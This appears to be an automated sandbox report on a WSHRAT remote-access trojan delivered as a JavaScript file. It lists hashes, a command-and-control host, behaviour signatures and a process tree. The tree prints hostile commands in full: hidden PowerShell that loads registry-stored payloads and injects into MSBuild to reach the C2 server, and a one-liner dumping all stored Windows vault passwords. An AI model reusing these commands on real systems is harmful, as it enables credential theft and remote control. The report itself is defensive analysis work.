Analysis
-
max time kernel
151s -
max time network
181s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
14/10/2021, 10:12
Static task
static1
Behavioral task
behavioral1
Sample
ID-92164.js
Resource
win7v20210408
General
-
Target
ID-92164.js
-
Size
1.0MB
-
MD5
2e49ab9cb1bcc2aef854c4ea0f4172b9
-
SHA1
9762fe64cdda7ca49f4247d8dd7497e8f6ef295e
-
SHA256
f9490f2e724d5ca5edd30a552f09f27b59b608361143e95edcc3ef860958ea5e
-
SHA512
3dfbbf4b7d3bd3091a3694319e9524baaf05b6db6c212fa73cbaf2df488a4aa104c057839434e7b766b8e2f603b94279d87f5139851516561397dd463c8f458f
Malware Config
Extracted
wshrat
http://3laallah.myvnc.com:5555
Signatures
-
Blocklisted process makes network request 17 IoCs
flow pid Process 6 1208 wscript.exe 8 1208 wscript.exe 9 1208 wscript.exe 10 1208 wscript.exe 11 1208 wscript.exe 13 1208 wscript.exe 14 1208 wscript.exe 15 1208 wscript.exe 16 1208 wscript.exe 17 1208 wscript.exe 18 1208 wscript.exe 19 1208 wscript.exe 20 1208 wscript.exe 21 1208 wscript.exe 22 1208 wscript.exe 23 1208 wscript.exe 24 1208 wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 1708 python.exe 1548 cmdc.exe 1760 cmdc.exe -
Loads dropped DLL 21 IoCs
pid Process 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe 1708 python.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts cmdc.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 3 IoCs
pid Process 1092 taskkill.exe 1788 taskkill.exe 1120 taskkill.exe -
Runs .reg file with regedit 1 IoCs
pid Process 1176 regedit.exe -
Script User-Agent 15 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 10 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 11 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 23 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 14 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 17 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 20 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 8 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 9 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 15 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 18 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 21 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 16 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 19 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 22 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 24 WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1708 python.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1640 powershell.exe 1640 powershell.exe 856 powershell.exe 856 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 988 powershell.exe 988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 988 powershell.exe Token: 35 1708 python.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 1788 taskkill.exe Token: SeDebugPrivilege 1120 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1208 wrote to memory of 1176 1208 wscript.exe 25 PID 1208 wrote to memory of 1176 1208 wscript.exe 25 PID 1208 wrote to memory of 1176 1208 wscript.exe 25 PID 1208 wrote to memory of 1640 1208 wscript.exe 31 PID 1208 wrote to memory of 1640 1208 wscript.exe 31 PID 1208 wrote to memory of 1640 1208 wscript.exe 31 PID 1208 wrote to memory of 856 1208 wscript.exe 33 PID 1208 wrote to memory of 856 1208 wscript.exe 33 PID 1208 wrote to memory of 856 1208 wscript.exe 33 PID 1208 wrote to memory of 1680 1208 wscript.exe 35 PID 1208 wrote to memory of 1680 1208 wscript.exe 35 PID 1208 wrote to memory of 1680 1208 wscript.exe 35 PID 1680 wrote to memory of 1516 1680 powershell.exe 37 PID 1680 wrote to memory of 1516 1680 powershell.exe 37 PID 1680 wrote to memory of 1516 1680 powershell.exe 37 PID 1680 wrote to memory of 1516 1680 powershell.exe 37 PID 1680 wrote to memory of 1320 1680 powershell.exe 38 PID 1680 wrote to memory of 1320 1680 powershell.exe 38 PID 1680 wrote to memory of 1320 1680 powershell.exe 38 PID 1680 wrote to memory of 1320 1680 powershell.exe 38 PID 1680 wrote to memory of 1920 1680 powershell.exe 39 PID 1680 wrote to memory of 1920 1680 powershell.exe 39 PID 1680 wrote to memory of 1920 1680 powershell.exe 39 PID 1680 wrote to memory of 1920 1680 powershell.exe 39 PID 1680 wrote to memory of 1464 1680 powershell.exe 40 PID 1680 wrote to memory of 1464 1680 powershell.exe 40 PID 1680 wrote to memory of 1464 1680 powershell.exe 40 PID 1680 wrote to memory of 1464 1680 powershell.exe 40 PID 1680 wrote to memory of 1016 1680 powershell.exe 41 PID 1680 wrote to memory of 1016 1680 powershell.exe 41 PID 1680 wrote to memory of 1016 1680 powershell.exe 41 PID 1680 wrote to memory of 1016 1680 powershell.exe 41 PID 1208 wrote to memory of 988 1208 wscript.exe 42 PID 1208 wrote to memory of 988 1208 wscript.exe 42 PID 1208 wrote to memory of 988 1208 wscript.exe 42 PID 1208 wrote to memory of 1072 1208 wscript.exe 44 PID 1208 wrote to memory of 1072 1208 wscript.exe 44 PID 1208 wrote to memory of 1072 1208 wscript.exe 44 PID 1072 wrote to memory of 1708 1072 cmd.exe 46 PID 1072 wrote to memory of 1708 1072 cmd.exe 46 PID 1072 wrote to memory of 1708 1072 cmd.exe 46 PID 1072 wrote to memory of 1708 1072 cmd.exe 46 PID 1208 wrote to memory of 1696 1208 wscript.exe 47 PID 1208 wrote to memory of 1696 1208 wscript.exe 47 PID 1208 wrote to memory of 1696 1208 wscript.exe 47 PID 1696 wrote to memory of 1092 1696 cmd.exe 49 PID 1696 wrote to memory of 1092 1696 cmd.exe 49 PID 1696 wrote to memory of 1092 1696 cmd.exe 49 PID 1208 wrote to memory of 1484 1208 wscript.exe 51 PID 1208 wrote to memory of 1484 1208 wscript.exe 51 PID 1208 wrote to memory of 1484 1208 wscript.exe 51 PID 1484 wrote to memory of 1788 1484 cmd.exe 53 PID 1484 wrote to memory of 1788 1484 cmd.exe 53 PID 1484 wrote to memory of 1788 1484 cmd.exe 53 PID 1208 wrote to memory of 1548 1208 wscript.exe 54 PID 1208 wrote to memory of 1548 1208 wscript.exe 54 PID 1208 wrote to memory of 1548 1208 wscript.exe 54 PID 1208 wrote to memory of 1548 1208 wscript.exe 54 PID 1208 wrote to memory of 596 1208 wscript.exe 55 PID 1208 wrote to memory of 596 1208 wscript.exe 55 PID 1208 wrote to memory of 596 1208 wscript.exe 55 PID 596 wrote to memory of 1120 596 cmd.exe 57 PID 596 wrote to memory of 1120 596 cmd.exe 57 PID 596 wrote to memory of 1120 596 cmd.exe 57
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ID-92164.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\regedit.exe"regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"2⤵
- Runs .reg file with regedit
PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'3laallah.myvnc.com 5555 \"WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 13⤵PID:1516
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 13⤵PID:1320
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 13⤵PID:1920
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 13⤵PID:1464
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 13⤵PID:1016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exeC:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
-
C:\Users\Admin\AppData\Local\Temp\cmdc.exe"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata2⤵
- Executes dropped EXE
PID:1548
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe2⤵
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
-
C:\Users\Admin\AppData\Local\Temp\cmdc.exe"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
PID:1760
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"2⤵PID:1436
-